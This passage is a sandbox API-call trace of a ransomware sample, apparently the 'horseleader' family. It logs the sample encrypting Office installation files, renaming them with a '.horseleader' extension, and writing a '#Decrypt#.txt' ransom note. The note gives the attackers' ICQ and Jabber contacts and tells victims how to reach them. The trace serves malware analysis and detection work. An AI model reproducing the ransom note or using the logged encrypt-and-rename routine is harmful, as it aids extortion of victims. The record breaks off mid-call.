out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe09b760, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="Office32WW.XML", cAlternateFileName="OFFICE~1.XML")) returned 0 [0244.605] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.605] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\#Decrypt#.txt") returned 109 [0244.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.609] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.609] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.611] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.611] CloseHandle (hObject=0x1a4) returned 1 [0244.611] GetProcessHeap () returned 0x780000 [0244.611] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.611] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="OneNote.en-us", cAlternateFileName="ONENOT~1.EN-")) returned 1 [0244.611] lstrcmpiW (lpString1="OneNote.en-us", lpString2="Windows") returned -1 [0244.611] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us") returned 97 [0244.611] lstrcmpW (lpString1="OneNote.en-us", lpString2=".") returned 1 [0244.612] lstrcmpW (lpString1="OneNote.en-us", lpString2="..") returned 1 [0244.612] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.612] GetProcessHeap () returned 0x780000 [0244.612] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.612] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*") returned 99 [0244.612] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.613] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.613] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\.") returned 99 [0244.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.613] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="..", cAlternateFileName="")) returned 1 [0244.614] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.614] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\..") returned 100 [0244.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.614] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.614] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58ed930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc840bb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OneNoteMUI.XML", cAlternateFileName="ONENOT~1.XML")) returned 1 [0244.614] lstrcmpiW (lpString1="OneNoteMUI.XML", lpString2="Windows") returned -1 [0244.614] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 112 [0244.614] StrStrIW (lpFirst="OneNoteMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.614] lstrcmpW (lpString1="OneNoteMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.614] lstrcmpW (lpString1="OneNoteMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.614] lstrlenW (lpString=".testttjffg") returned 11 [0244.614] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.614] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.614] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.615] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 112 [0244.615] StrStrW (lpFirst="OneNoteMUI.XML", lpSrch=".txt") returned 0x0 [0244.615] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1606) returned 1 [0244.616] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x646, lpOverlapped=0x0) returned 1 [0244.618] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff9ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.619] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x646, lpOverlapped=0x0) returned 1 [0244.619] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.619] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.619] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.619] CloseHandle (hObject=0x15c) returned 1 [0244.620] GetProcessHeap () returned 0x780000 [0244.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.620] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.horseleader") returned 124 [0244.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.horseleader")) returned 1 [0244.621] GetProcessHeap () returned 0x780000 [0244.621] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.621] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0d4a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.621] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.621] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 107 [0244.621] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.621] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.621] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.621] lstrlenW (lpString=".testttjffg") returned 11 [0244.621] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.621] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.621] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.622] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 107 [0244.622] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.622] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1988) returned 1 [0244.622] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x7c4, lpOverlapped=0x0) returned 1 [0244.624] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.624] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x7c4, lpOverlapped=0x0) returned 1 [0244.625] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.625] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.625] CloseHandle (hObject=0x15c) returned 1 [0244.625] GetProcessHeap () returned 0x780000 [0244.625] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.625] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.horseleader") returned 119 [0244.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.horseleader")) returned 1 [0244.626] GetProcessHeap () returned 0x780000 [0244.626] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.626] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0d4a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.627] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.627] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\#Decrypt#.txt") returned 111 [0244.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.630] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.630] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.632] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.632] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.632] CloseHandle (hObject=0x1a4) returned 1 [0244.632] GetProcessHeap () returned 0x780000 [0244.632] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.632] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x302b0500, ftCreationTime.dwHighDateTime=0x1cba073, ftLastAccessTime.dwLowDateTime=0xcf459e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x302b0500, ftLastWriteTime.dwHighDateTime=0x1cba073, nFileSizeHigh=0x0, nFileSizeLow=0x709b68, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="OSETUP.DLL", cAlternateFileName="")) returned 1 [0244.632] lstrcmpiW (lpString1="OSETUP.DLL", lpString2="Windows") returned -1 [0244.632] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 94 [0244.632] StrStrIW (lpFirst="OSETUP.DLL", lpSrch=".horseleader") returned 0x0 [0244.632] lstrcmpW (lpString1="OSETUP.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.632] lstrcmpW (lpString1="OSETUP.DLL", lpString2="_uninstalling_.png") returned 1 [0244.632] lstrlenW (lpString=".testttjffg") returned 11 [0244.632] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL", lpSrch=".testttjffg") returned 0x0 [0244.632] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.633] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common 